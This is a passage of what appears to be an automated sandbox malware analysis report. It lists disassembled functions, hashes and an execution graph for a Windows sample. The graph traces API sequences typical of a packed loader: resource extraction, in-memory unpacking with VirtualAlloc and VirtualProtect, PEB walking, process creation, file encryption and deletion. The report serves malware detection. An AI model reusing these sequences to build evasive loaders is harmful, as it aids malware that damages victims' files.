                                                                  • Instruction ID: 608e97be970086dca0e1fa4dc7a0ff41e63cb8bbaa647bae0e741146e3f8859e
                                                                  • Opcode Fuzzy Hash: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
                                                                  • Instruction Fuzzy Hash: 2AF06276900218BFDB207FA59C05C9FBBACDE44214B15043AF940B3152FA75AD108E54
                                                                  Function 00422479 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: (C$8C
                                                                  • API String ID: 3519838083-3442521767
                                                                  • Opcode ID: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction ID: 7ee2ab24155dd1533db6df93568111abed88cbadf2414e72971fbd093de00081
                                                                  • Opcode Fuzzy Hash: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction Fuzzy Hash: 1D017571F01170AFD738BB19A6447AEB2A0AF08710F46826FA05997690CBBC8C408A49
                                                                  Function 00429BB8 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                  • LocalFree.KERNEL32(?), ref: 00429C2E
                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                  • String ID:
                                                                  • API String ID: 2949335588-0
                                                                  • Opcode ID: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction ID: 4f4236dd2a41b9a2d9142ab37103e81bc3eebe3eca6605d7b1983f38d4fab71a
                                                                  • Opcode Fuzzy Hash: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction Fuzzy Hash: 2011AC34700610EFD720CF56E884B6AB7B4FF05315F90802EE1468B2A1CB75BC50CB18
                                                                  Function 00410D0F Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00411300,00000000,?,00000000), ref: 00410D36
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00411300,00000000,?,00000000), ref: 00410D6F
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00410D8D
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00410DA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction ID: 5ba2f75a3631e755b4902d4e05e9c9231f22547c1912ff447ca3f9ea5e59f1b4
                                                                  • Opcode Fuzzy Hash: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction Fuzzy Hash: 3E118FB4600200DFD7718F99FC45D627BB5FB82315760453AF296C62B0C770B8AACB18
                                                                  Function 00429F15 Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                  • LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429EAC: InitializeCriticalSection.KERNEL32(0043F21C,00429F23,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429EC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitialize$Leave
                                                                  • String ID:
                                                                  • API String ID: 713024617-0
                                                                  • Opcode ID: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction ID: 64048ed4fafcfd63e0d0b0e47ab2320bfea24fe3f3f20fa265999014551e40f8
                                                                  • Opcode Fuzzy Hash: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction Fuzzy Hash: 87F06D7690021ADFDB109F95FC84BA7B7ACFB14316F801437E60492021D739A86ACAAC

                                                                  Execution Graph

                                                                  Execution Coverage:3%
                                                                  Dynamic/Decrypted Code Coverage:51.8%
                                                                  Signature Coverage:0.2%
                                                                  Total number of Nodes:564
                                                                  Total number of Limit Nodes:75
                                                                  execution_graph 36076 4254c2 8 API calls 36077 402530 LoadLibraryA GetProcAddress EncryptFileA 36078 40257b 36077->36078 36133 4029de 36077->36133 36134 401d60 36078->36134 36080 4025d6 36081 401d60 ctype 35 API calls 36080->36081 36082 402605 36081->36082 36083 401d60 ctype 35 API calls 36082->36083 36084 402635 36083->36084 36144 402490 36084->36144 36086 402657 36087 402490 35 API calls 36086->36087 36088 402675 36087->36088 36089 401d60 ctype 35 API calls 36088->36089 36090 4026c2 36089->36090 36091 401d60 ctype 35 API calls 36090->36091 36092 4026f2 36091->36092 36093 401d60 ctype 35 API calls 36092->36093 36094 402722 36093->36094 36095 402490 35 API calls 36094->36095 36096 402741 36095->36096 36097 402490 35 API calls 36096->36097 36098 40275f 36097->36098 36099 401d60 ctype 35 API calls 36098->36099 36100 4027a5 36099->36100 36101 401d60 ctype 35 API calls 36100->36101 36102 4027d5 36101->36102 36103 401d60 ctype 35 API calls 36102->36103 36104 4027ff 36103->36104 36105 402490 35 API calls 36104->36105 36106 40281e 36105->36106 36107 402490 35 API calls 36106->36107 36108 402839 36107->36108 36109 401d60 ctype 35 API calls 36108->36109 36110 40288b 36109->36110 36111 401d60 ctype 35 API calls 36110->36111 36112 4028bb 36111->36112 36113 402490 35 API calls 36112->36113 36114 4028e0 LoadLibraryA GetProcAddress 36113->36114 36115 402915 36114->36115 36116 40291c GetProcAddress LdrFindResource_U 36114->36116 36115->36116 36117 402967 VirtualAlloc 36116->36117 36118 40294a LdrAccessResource 36116->36118 36151 401190 36117->36151 36118->36117 36120 4029aa 36154 401e50 36120->36154 36122 4029c1 36161 42c68a 66 API calls 3 library calls 36122->36161 36124 4029cc 36125 4029d4 36124->36125 36126 402c5f 36124->36126 36162 4270cc 70 API calls 2 library calls 36125->36162 36163 404ad1 30 API calls ctype 36126->36163 36129 402c65 36164 403b40 65 API calls ctype 36129->36164 36131 402c75 36165 4015d0 65 API calls ctype 36131->36165 36137 401d6d 36134->36137 36135 401db1 36136 401dc2 36135->36136 36180 41bf10 35 API calls 2 library calls 36135->36180 36142 401dd5 36136->36142 36181 401470 34 API calls ctype 36136->36181 36137->36135 36140 401d94 36137->36140 36166 401c70 36140->36166 36142->36080 36143 401dab 36143->36080 36145 401c70 ctype 35 API calls 36144->36145 36146 4024d1 36145->36146 36187 401a60 36146->36187 36149 401c70 ctype 35 API calls 36150 402502 36149->36150 36150->36086 36201 40de64 36151->36201 36153 40119a 36153->36120 36153->36153 36155 4023dd 36154->36155 36156 401e71 36154->36156 36155->36122 36157 41bc0c 35 API calls 36156->36157 36158 401b50 49 API calls 36156->36158 36159 401850 37 API calls 36156->36159 36160 4023c4 36156->36160 36157->36156 36158->36156 36159->36156 36160->36122 36161->36124 36162->36133 36163->36129 36164->36131 36165->36133 36167 401c83 36166->36167 36168 401c88 36166->36168 36182 41be75 35 API calls 2 library calls 36167->36182 36170 401cba 36168->36170 36171 401c9b 36168->36171 36173 401cc6 36170->36173 36185 41bf10 35 API calls 2 library calls 36170->36185 36183 4013f0 35 API calls 2 library calls 36171->36183 36177 401cd9 36173->36177 36186 401470 34 API calls ctype 36173->36186 36174 401ca7 36184 4013f0 35 API calls 2 library calls 36174->36184 36177->36143 36179 401cb1 36179->36143 36180->36136 36181->36142 36183->36174 36184->36179 36185->36173 36186->36177 36188 401a72 36187->36188 36189 401a77 36187->36189 36197 41be75 35 API calls 2 library calls 36188->36197 36191 401a99 36189->36191 36198 41bf10 35 API calls 2 library calls 36189->36198 36193 401ab3 36191->36193 36196 401ac6 36191->36196 36199 41bf10 35 API calls 2 library calls 36191->36199 36193->36196 36200 401470 34 API calls ctype 36193->36200 36196->36149 36198->36191 36199->36193 36200->36196 36204 40de38 36201->36204 36205 40de61 36204->36205 36207 40de3f __getbuf 36204->36207 36205->36153 36207->36205 36208 40ddbd 36207->36208 36210 40ddc9 __lock 36208->36210 36209 40ddfc 36212 40de17 RtlAllocateHeap 36209->36212 36214 40de26 __lock 36209->36214 36210->36209 36218 4108e8 34 API calls __lock 36210->36218 36212->36214 36213 40dde4 36219 4111ab 5 API calls __getbuf 36213->36219 36214->36207 36216 40ddef 36220 40de2f LeaveCriticalSection ctype 36216->36220 36218->36213 36219->36216 36220->36209 36221 40e812 36222 40e81e __lock _fast_error_exit 36221->36222 36223 40e82a GetVersionExA 36222->36223 36224 40e872 GetModuleHandleA 36223->36224 36225 40e866 36223->36225 36226 40e88e 36224->36226 36225->36224 36273 410933 HeapCreate 36226->36273 36228 40e8e0 36229 40e8ec 36228->36229 36296 40e7ee 34 API calls _fast_error_exit 36228->36296 36297 411f5d 42 API calls _TranslateName 36229->36297 36232 40e8f2 36233 40e8f6 36232->36233 36234 40e8fe 36232->36234 36298 40e7ee 34 API calls _fast_error_exit 36233->36298 36281 412b89 39 API calls 2 library calls 36234->36281 36236 40e8fd 36236->36234 36238 40e90b 36239 40e917 GetCommandLineA 36238->36239 36240 40e90f 36238->36240 36282 412a67 42 API calls 3 library calls 36239->36282 36299 40e7c9 34 API calls _fast_error_exit 36240->36299 36243 40e916 36243->36239 36244 40e927 36300 4129c5 64 API calls 2 library calls 36244->36300 36246 40e931 36247 40e935 36246->36247 36248 40e93d 36246->36248 36301 40e7c9 34 API calls _fast_error_exit 36247->36301 36283 412792 63 API calls 5 library calls 36248->36283 36251 40e942 36253 40e946 36251->36253 36254 40e94e 36251->36254 36252 40e93c 36252->36248 36302 40e7c9 34 API calls _fast_error_exit 36253->36302 36284 40efc5 38 API calls 36254->36284 36257 40e94d 36257->36254 36258 40e955 36259 40e964 GetStartupInfoA 36258->36259 36260 40e95d 36258->36260 36285 412735 63 API calls 2 library calls 36259->36285 36303 40e7c9 34 API calls _fast_error_exit 36260->36303 36263 40e963 36263->36259 36264 40e976 36265 40e97f 36264->36265 36266 40e988 GetModuleHandleA 36265->36266 36286 41de27 36266->36286 36269 40e9a6 36305 40f114 34 API calls _fast_error_exit 36269->36305 36272 40e9ab __lock 36274 410953 36273->36274 36275 41097d 36273->36275 36276 410980 36274->36276 36277 410962 36274->36277 36275->36228 36276->36228 36306 410984 HeapAlloc 36277->36306 36279 41096c 36279->36276 36280 410971 HeapDestroy 36279->36280 36280->36275 36281->36238 36282->36244 36283->36251 36284->36258 36285->36264 36287 425bbd 36286->36287 36307 41f394 30 API calls ctype 36287->36307 36289 425bc8 36308 4295d4 36289->36308 36294 40e996 36294->36269 36304 40f0f2 34 API calls _fast_error_exit 36294->36304 36296->36229 36297->36232 36298->36236 36299->36243 36300->36246 36301->36252 36302->36257 36303->36263 36304->36269 36305->36272 36306->36279 36307->36289 36327 429ca6 36308->36327 36311 425bcf 36313 42a282 SetErrorMode SetErrorMode 36311->36313 36314 4295d4 ctype 30 API calls 36313->36314 36315 42a29a 36314->36315 36316 4295d4 ctype 30 API calls 36315->36316 36317 42a2a9 36316->36317 36318 42a2c8 36317->36318 36358 42a134 36317->36358 36320 4295d4 ctype 30 API calls 36318->36320 36321 42a2cd 36320->36321 36322 42a2d9 36321->36322 36386 41f835 36321->36386 36324 42a2e8 GetProcAddress 36322->36324 36325 425be7 36322->36325 36324->36325 36326 42c88c 67 API calls ctype 36325->36326 36326->36294 36328 429cb0 __EH_prolog 36327->36328 36330 429cd5 36328->36330 36334 429ce6 36328->36334 36339 4299f1 TlsAlloc 36328->36339 36342 4297aa EnterCriticalSection 36330->36342 36333 429cf5 36335 429cfb 36333->36335 36336 4295e3 36333->36336 36352 4298b6 EnterCriticalSection 36334->36352 36357 429a96 9 API calls 2 library calls 36335->36357 36336->36311 36338 429916 6 API calls 2 library calls 36336->36338 36338->36311 36340 429a20 36339->36340 36341 429a25 InitializeCriticalSection 36339->36341 36340->36341 36341->36330 36345 4297cb 36342->36345 36343 429880 _TranslateName 36344 429897 LeaveCriticalSection 36343->36344 36344->36334 36345->36343 36346 429814 GlobalHandle GlobalUnlock GlobalReAlloc 36345->36346 36347 429804 GlobalAlloc 36345->36347 36348 429839 36346->36348 36347->36348 36349 429860 GlobalLock 36348->36349 36350 429852 LeaveCriticalSection 36348->36350 36351 429844 GlobalHandle GlobalLock 36348->36351 36349->36343 36350->36349 36351->36350 36353 4298cd 36352->36353 36356 4298de LeaveCriticalSection 36352->36356 36354 4298d2 TlsGetValue 36353->36354 36353->36356 36354->36356 36356->36333 36357->36336 36359 4295d4 ctype 30 API calls 36358->36359 36360 42a157 GetModuleFileNameA 36359->36360 36361 42a17f 36360->36361 36362 42a188 PathFindExtensionA 36361->36362 36401 425d8a RaiseException ctype 36361->36401 36364 42a1a1 36362->36364 36365 42a19c 36362->36365 36392 42a105 PathFindFileNameA lstrlenA lstrcpynA 36364->36392 36402 425d8a RaiseException ctype 36365->36402 36368 42a1bb 36369 42a1c4 36368->36369 36403 425d8a RaiseException ctype 36368->36403 36371 42a1d7 36369->36371 36404 40f132 34 API calls 3 library calls 36369->36404 36373 42a205 36371->36373 36393 42453c 36371->36393 36374 42a245 36373->36374 36379 42a226 lstrcpyA 36373->36379 36376 42a24a lstrcatA 36374->36376 36377 42a268 36374->36377 36407 40f132 34 API calls 3 library calls 36376->36407 36408 40e9e7 34 API calls 2 library calls 36377->36408 36406 40f132 34 API calls 3 library calls 36379->36406 36383 42a27a 36383->36318 36384 42a23b 36384->36374 36387 4295d4 ctype 30 API calls 36386->36387 36388 41f83a 36387->36388 36389 41f862 36388->36389 36415 4295c4 36388->36415 36389->36322 36392->36368 36394 424548 36393->36394 36399 424560 36393->36399 36395 4295d4 ctype 30 API calls 36394->36395 36396 42454d 36395->36396 36409 403250 FindResourceA 36396->36409 36398 42455a 36398->36399 36400 424566 WideCharToMultiByte 36398->36400 36405 40f132 34 API calls 3 library calls 36399->36405 36400->36399 36404->36371 36405->36373 36406->36384 36407->36377 36408->36383 36410 403271 36409->36410 36411 403274 36409->36411 36410->36398 36414 4031f0 LoadResource LockResource SizeofResource 36411->36414 36413 40327c 36413->36398 36414->36413 36416 429ca6 ctype 24 API calls 36415->36416 36417 41f846 GetCurrentThreadId SetWindowsHookExA 36416->36417 36417->36389 36418 2234ba0 36419 2234bb2 36418->36419 36424 2234bc8 36418->36424 36440 2233f20 GetPEB 36419->36440 36421 2234bbc 36441 2233e80 GetPEB 36421->36441 36423 2234c07 CreateProcessW 36426 2234ca3 36423->36426 36427 2234c27 36423->36427 36424->36423 36442 2233f20 GetPEB 36424->36442 36428 2234c2f 36427->36428 36430 2234c63 36427->36430 36444 2233f20 GetPEB 36427->36444 36429 2234bf6 36443 2233e80 GetPEB 36429->36443 36436 2234c8d 36430->36436 36446 2233f20 GetPEB 36430->36446 36433 2234c02 36433->36423 36434 2234c57 36445 2233e80 GetPEB 36434->36445 36438 2234c81 36447 2233e80 GetPEB 36438->36447 36440->36421 36441->36424 36442->36429 36443->36433 36444->36434 36445->36430 36446->36438 36447->36436 36448 2235ca0 36456 2236530 36448->36456 36450 2235ca5 36451 2235cc9 ExitProcess 36450->36451 36498 2233f20 GetPEB 36450->36498 36453 2235cb8 36499 2233e80 GetPEB 36453->36499 36455 2235cc4 36455->36451 36497 2236551 36456->36497 36457 2236ee9 36575 223b160 GetPEB 36457->36575 36460 2236eee 36460->36450 36461 2236f03 36577 2238590 GetPEB 36461->36577 36465 22369c9 36465->36450 36467 2236ef6 36576 2238ba0 GetPEB CreateProcessW 36467->36576 36473 2236efb 36473->36450 36482 2234250 GetPEB 36482->36497 36491 2233e80 GetPEB 36491->36497 36492 2234190 GetPEB 36492->36497 36495 2233f20 GetPEB 36495->36497 36497->36457 36497->36461 36497->36465 36497->36467 36497->36482 36497->36491 36497->36492 36497->36495 36500 2238240 36497->36500 36506 2237ec0 36497->36506 36521 2236fb0 36497->36521 36542 2238a10 36497->36542 36552 223b050 GetPEB 36497->36552 36553 22360e0 GetPEB 36497->36553 36554 2239d70 GetPEB 36497->36554 36555 223b2b0 GetPEB GetCurrentProcessId CreateProcessW 36497->36555 36556 22396b0 FindNextFileW FindFirstFileW FindClose GetPEB RtlAllocateHeap 36497->36556 36557 22390c0 GetPEB 36497->36557 36558 2239470 GetPEB 36497->36558 36559 2238550 GetPEB 36497->36559 36560 2238ea0 GetPEB 36497->36560 36561 2235f60 GetPEB 36497->36561 36562 2235360 GetPEB 36497->36562 36563 22387d0 GetPEB RtlAllocateHeap 36497->36563 36564 22347a0 GetPEB GetCurrentProcessId 36497->36564 36565 2239ea0 GetPEB 36497->36565 36566 2239320 GetPEB 36497->36566 36567 2237160 GetPEB 36497->36567 36568 22312b0 _snwprintf GetPEB RtlAllocateHeap 36497->36568 36569 22372a0 GetPEB 36497->36569 36570 2233310 GetPEB 36497->36570 36571 2231890 GetPEB RtlAllocateHeap 36497->36571 36572 2233460 GetPEB 36497->36572 36573 2238cd0 GetPEB 36497->36573 36574 223ae60 GetPEB 36497->36574 36498->36453 36499->36455 36502 2238332 36500->36502 36501 2233f20 GetPEB 36501->36502 36502->36501 36503 223838c CreateFileW 36502->36503 36504 22384b8 36502->36504 36505 2233e80 GetPEB 36502->36505 36503->36502 36503->36504 36504->36497 36505->36502 36507 2237f94 36506->36507 36509 22381d0 CreateFileW 36507->36509 36511 2238200 36507->36511 36512 2238166 36507->36512 36513 2233f20 GetPEB 36507->36513 36515 223813f SetFileInformationByHandle 36507->36515 36520 2233e80 GetPEB 36507->36520 36578 22334c0 36507->36578 36509->36507 36510 2238227 36509->36510 36510->36497 36514 2238224 FindCloseChangeNotification 36511->36514 36588 2233f20 GetPEB 36511->36588 36512->36497 36513->36507 36514->36510 36515->36507 36517 2238213 36589 2233e80 GetPEB 36517->36589 36519 223821f 36519->36514 36520->36507 36522 2236fb5 36521->36522 36523 22370bf 36522->36523 36524 22370be 36522->36524 36526 2236f10 GetPEB LoadLibraryW 36522->36526 36525 22334c0 GetPEB 36523->36525 36524->36497 36528 22370cb 36525->36528 36526->36522 36527 22370f1 LoadLibraryW 36529 223711c 36527->36529 36530 2237106 36527->36530 36528->36527 36594 2233f20 GetPEB 36528->36594 36538 2237144 36529->36538 36598 2233f20 GetPEB 36529->36598 36596 2233f20 GetPEB 36530->36596 36532 22370e0 36595 2233e80 GetPEB 36532->36595 36535 2237110 36597 2233e80 GetPEB 36535->36597 36536 22370ec 36536->36527 36538->36497 36540 2237138 36599 2233e80 GetPEB 36540->36599 36550 2238a24 36542->36550 36544 2238b8a 36626 22336b0 36544->36626 36546 2238b3e 36546->36497 36547 2238b93 36547->36497 36548 22334c0 GetPEB 36548->36550 36549 2233f20 GetPEB 36549->36550 36550->36544 36550->36546 36550->36548 36550->36549 36551 2233e80 GetPEB 36550->36551 36600 2233780 36550->36600 36551->36550 36552->36497 36553->36497 36554->36497 36555->36497 36556->36497 36557->36497 36558->36497 36559->36497 36560->36497 36561->36497 36562->36497 36563->36497 36564->36497 36565->36497 36566->36497 36567->36497 36568->36497 36569->36497 36570->36497 36571->36497 36572->36497 36573->36497 36574->36497 36575->36460 36576->36473 36577->36465 36579 22334e3 36578->36579 36580 2233508 36579->36580 36590 2233f20 GetPEB 36579->36590 36584 2233530 36580->36584 36592 2233f20 GetPEB 36580->36592 36582 22334fc 36591 2233e80 GetPEB 36582->36591 36584->36507 36586 2233524 36593 2233e80 GetPEB 36586->36593 36588->36517 36589->36519 36590->36582 36591->36580 36592->36586 36593->36584 36594->36532 36595->36536 36596->36535 36597->36529 36598->36540 36599->36538 36601 22337ab 36600->36601 36602 2233795 36600->36602 36606 22337dd 36601->36606 36648 2233f20 GetPEB 36601->36648 36646 2233f20 GetPEB 36602->36646 36604 223379f 36647 2233e80 GetPEB 36604->36647 36610 2233812 36606->36610 36650 2233f20 GetPEB 36606->36650 36608 22337d1 36649 2233e80 GetPEB 36608->36649 36614 223384a 36610->36614 36652 2233f20 GetPEB 36610->36652 36612 2233806 36651 2233e80 GetPEB 36612->36651 36618 2233876 36614->36618 36654 2233f20 GetPEB 36614->36654 36616 223383e 36653 2233e80 GetPEB 36616->36653 36622 22338cc 36618->36622 36656 2233f20 GetPEB 36618->36656 36620 223386a 36655 2233e80 GetPEB 36620->36655 36622->36550 36624 22338c0 36657 2233e80 GetPEB 36624->36657 36627 22334c0 GetPEB 36626->36627 36628 22336c4 36627->36628 36629 22336e5 36628->36629 36658 2233f20 GetPEB 36628->36658 36633 223371a 36629->36633 36660 2233f20 GetPEB 36629->36660 36631 22336d9 36659 2233e80 GetPEB 36631->36659 36637 2233742 36633->36637 36662 2233f20 GetPEB 36633->36662 36635 223370e 36661 2233e80 GetPEB 36635->36661 36641 2233773 DeleteFileW 36637->36641 36664 2233f20 GetPEB 36637->36664 36639 2233736 36663 2233e80 GetPEB 36639->36663 36641->36547 36643 2233762 36665 2233e80 GetPEB 36643->36665 36645 223376e 36645->36641 36646->36604 36647->36601 36648->36608 36649->36606 36650->36612 36651->36610 36652->36616 36653->36614 36654->36620 36655->36618 36656->36624 36657->36622 36658->36631 36659->36629 36660->36635 36661->36633 36662->36639 36663->36637 36664->36643 36665->36645 36666 22330d0 36675 22330ea 36666->36675 36667 22332b5 36673 22331df 36667->36673 36676 2233f20 GetPEB 36667->36676 36669 2233f20 GetPEB 36669->36675 36670 22332c9 36677 2233e80 GetPEB 36670->36677 36672 2233e80 GetPEB 36672->36675 36674 223317a RtlAllocateHeap 36674->36673 36674->36675 36675->36667 36675->36669 36675->36672 36675->36673 36675->36674 36676->36670 36677->36673 36678 2190000 36680 2190005 36678->36680 36683 219002d 36680->36683 36703 2190456 GetPEB 36683->36703 36686 2190456 GetPEB 36687 2190053 36686->36687 36688 2190456 GetPEB 36687->36688 36689 2190061 36688->36689 36690 2190456 GetPEB 36689->36690 36691 219006d 36690->36691 36692 2190456 GetPEB 36691->36692 36693 219007b 36692->36693 36694 2190456 GetPEB 36693->36694 36698 2190089 36694->36698 36695 2190029 36696 21900e4 GetNativeSystemInfo 36696->36695 36697 2190107 VirtualAlloc 36696->36697 36700 219012f 36697->36700 36698->36695 36698->36696 36699 21903b2 36705 21c27b0 36699->36705 36700->36699 36701 2190388 VirtualProtect 36700->36701 36701->36695 36701->36700 36704 2190045 36703->36704 36704->36686 36708 21c1000 36705->36708 36711 21c1030 LoadLibraryW GetProcAddress 36708->36711 36752 21c1b30 36711->36752 36714 21c1091 SetLastError 36748 21c102b ExitProcess 36714->36748 36715 21c10a3 36716 21c1b30 SetLastError 36715->36716 36717 21c10b9 36716->36717 36718 21c10de SetLastError 36717->36718 36719 21c10f0 36717->36719 36717->36748 36718->36748 36720 21c10ff SetLastError 36719->36720 36721 21c1111 36719->36721 36720->36748 36722 21c111c SetLastError 36721->36722 36724 21c112e GetNativeSystemInfo 36721->36724 36722->36748 36725 21c11bc 36724->36725 36726 21c11e9 36725->36726 36727 21c11d7 SetLastError 36725->36727 36755 21c1800 VirtualAlloc 36726->36755 36727->36748 36728 21c1202 36729 21c123d GetProcessHeap RtlAllocateHeap 36728->36729 36756 21c1800 VirtualAlloc 36728->36756 36730 21c127b 36729->36730 36731 21c1257 SetLastError 36729->36731 36735 21c1b30 SetLastError 36730->36735 36731->36748 36732 21c1222 36732->36729 36734 21c122e SetLastError 36732->36734 36734->36748 36736 21c12fb 36735->36736 36737 21c1302 36736->36737 36757 21c1800 VirtualAlloc 36736->36757 36783 21c16c0 GetProcessHeap HeapFree VirtualFree 36737->36783 36738 21c1320 36758 21c1b50 36738->36758 36741 21c136b 36741->36737 36764 21c21a0 36741->36764 36745 21c13ca 36745->36737 36746 21c13eb 36745->36746 36747 21c13ff GetPEB 36746->36747 36746->36748 36747->36748 36753 21c1b3b SetLastError 36752->36753 36754 21c1070 36752->36754 36753->36754 36754->36714 36754->36715 36754->36748 36755->36728 36756->36732 36757->36738 36761 21c1b7d 36758->36761 36759 21c1b30 SetLastError 36760 21c1c32 36759->36760 36762 21c1be9 36760->36762 36784 21c1800 VirtualAlloc 36760->36784 36761->36759 36761->36762 36762->36741 36765 21c21dd IsBadHugeReadPtr 36764->36765 36766 21c13b5 36764->36766 36765->36766 36768 21c2207 36765->36768 36766->36737 36777 21c1e80 36766->36777 36768->36766 36769 21c224d 36768->36769 36770 21c2239 SetLastError 36768->36770 36785 21c1a20 VirtualQuery VirtualFree VirtualAlloc 36769->36785 36770->36766 36772 21c2267 36773 21c2273 SetLastError 36772->36773 36776 21c229d 36772->36776 36773->36766 36775 21c23ae SetLastError 36775->36766 36776->36766 36776->36775 36780 21c1eba 36777->36780 36778 21c1fe5 36779 21c1d10 2 API calls 36778->36779 36782 21c1fc1 36779->36782 36780->36778 36780->36782 36786 21c1d10 36780->36786 36782->36745 36783->36748 36784->36762 36785->36772 36787 21c1d29 36786->36787 36791 21c1d1f 36786->36791 36788 21c1d37 36787->36788 36790 21c1d9d VirtualProtect 36787->36790 36788->36791 36793 21c1820 VirtualFree 36788->36793 36790->36791 36791->36780 36793->36791 36794 22396c9 36804 22396d0 36794->36804 36795 2239948 36796 2239967 36795->36796 36819 2233f20 GetPEB 36795->36819 36821 2233070 FindNextFileW FindFirstFileW FindClose GetPEB 36796->36821 36799 223995b 36820 2233e80 GetPEB 36799->36820 36803 2233f20 GetPEB 36803->36804 36804->36795 